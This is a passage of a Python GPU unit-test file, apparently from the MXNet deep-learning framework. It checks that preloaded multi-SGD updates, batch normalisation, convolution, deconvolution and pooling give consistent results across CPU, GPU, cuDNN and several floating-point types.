check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
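# The "preloaded" variants receive lrs/wds as NDArrays (mx_lrs, mx_wds) rather than python
# lists; both code paths must yield identical updated weights (and momenta / fp32 master
# weights when present), which is asserted at the end of this function.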
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
bools = [False, True]
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
for fix_gamma, cudnn_off in itertools.product(bools, [True,]):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, rtol=tol, atol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], scale=0.1)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], rtol=1e-2, atol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@unittest.skip("skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in ['1', '2']:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print('Starting engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print('Finished engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
